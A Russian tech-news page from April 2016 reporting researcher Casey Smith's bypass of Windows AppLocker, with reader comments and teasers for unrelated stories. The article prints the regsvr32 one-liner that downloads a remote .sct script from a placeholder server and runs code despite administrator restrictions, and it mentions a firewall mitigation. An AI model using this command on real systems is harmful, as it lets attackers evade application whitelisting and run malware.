• Российские мобильные телефоны массово атакует новый вирус

    Вирус-троян захватывает мобильные телефоны держателей карт Сбербанка. Уже пострадало более 300 тыс. человек. Вредоносная программа практически не видна антивирусникам и достаточно кровожадна, она будет работать пока у вас не останется денег на карте, а дальше начнет использовать ваши контакты и рассылать СМСки знакомым.
    Читать дальше
  • Как российские операторы относятся к eSIM

    eSIM представляет собой технологию цифровых SIM-карт, которая была реализована в новых iPhone. По словам исполнительного вице-президента по корпоративной стратегии и развитию бизнеса «ВымпелКома» Александра Поповского, эта технология вызвала интерес у российских операторов: они присматриваются к eSIM и в перспективе не исключают ее внедре...
    Читать дальше
  • Япония первой в мире испытает прототип космического лифта

    Obayashi – строительная компания из Японии, сотрудничающая с Университетом Сидзуока. Ее представители регулярно сообщают, что хотят возвести космический лифт. Всякий раз инженеров останавливает отсутствие материала, оптимального для троса. По слухам, в проекте ожидается настоящий прорыв. Уже на ближайшие дни запланированы испытания протот...
    Читать дальше
  • Четырехглазый смартфон от Samsung показал свое лицо

    На прошлой неделе компания заинтриговала намеками на разработку четырехкамерного смартфона. И вот теперь рендеры Samsung Galaxy A9 Star Pro заполонили Instagram. Первым картинки смартфона с рядом камер и сканером отпечатков пальцев на задней панели опубликовал профильный аккаунт AllAboutSamsung.
    Читать дальше
  • 13 долларов – и ваши наушники станут беспроводными

    Беспроводной адаптер от Xiaomi позволяет использовать обычные наушники для прослушивания музыки по Bluetooth. Компания Meizu решила не отставать и создала примерно такой же гаджет. Его полное название - Meizu Bluetooth Audio Receiver.
    Читать дальше

Безопасность Windows оказалась под угрозой

27 апреля 2016 | Windows
Безопасность Windows оказалась под угрозой

В течение многих лет в бизнес-ориентированных версиях Windows присутствует функция AppLocker, которая позволяет администратору регулировать запуск тех или иных программ на компьютере. Например, можно запретить установку любых программ или запуск уже имеющихся приложений, которые не относятся к работе сотрудника. Это несомненно полезно для компаний, стремящихся защитить свою структуру от потенциально опасного ПО, однако исследователь Кейси Смит (Casey Smith) выяснил, что полностью доверять AppLocker не стоит, поскольку обнаруженная им уязвимость позволяет обходить ограничения администратора с помощью одной строки кода. Таким образом хакерам ничего не стоит взломать компьютеры и запустить вредоносное ПО.

Кейси Смит указал на инструмент Regsvr32, который можно использовать не по назначению для скачивания из интернета определенного XML-файла. Ввод команды вида regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll и скачивание файла, приведет к запуску cmd.exe, который можно заменить на любую другую программу, несмотря на установленные администратором ограничения в AppLocker. Атака не оставляет следов на жестком диске и в реестре, а в арсенале Microsoft пока не существует соответствующей «заплатки» для этой уязвимости. Описание ее Смит опубликовал на сервисе GitHub. Как вариант защиты рекомендуется отрезать Regsvr32 от интернета с помощью файервола.

Источник: engadget.com
Понравился пост? Просоединяйтесь к нам в Facebook!

Написать комментарий


Включите эту картинку для отображения кода безопасности
обновить, если не виден код


Комментарии: 5

avatar
27 апреля 2016 10:17 Hilo
Есть повод разработчикам заняться работой
+ 2
Ответить
avatar
27 апреля 2016 10:58 Гость_Xumepa
С админом можно и договориться об установке необходимого ПО
+ 0
Ответить
avatar
27 апреля 2016 11:30 Гость_M
В россии, за рубежом зарплата сисадминрстраторов достаточно высокая дабы не договорились
+ 0
Ответить
avatar
27 апреля 2016 12:08 WadymOS
Это что ж за админ такой, с которым можно договориться?
+ 0
Ответить
avatar
28 апреля 2016 11:41 zlodeu
Я например! )))
+ 3
Ответить
В Вашем браузере отключен JavaScript. Для корректной работы сайта настоятельно рекомендуется его включить.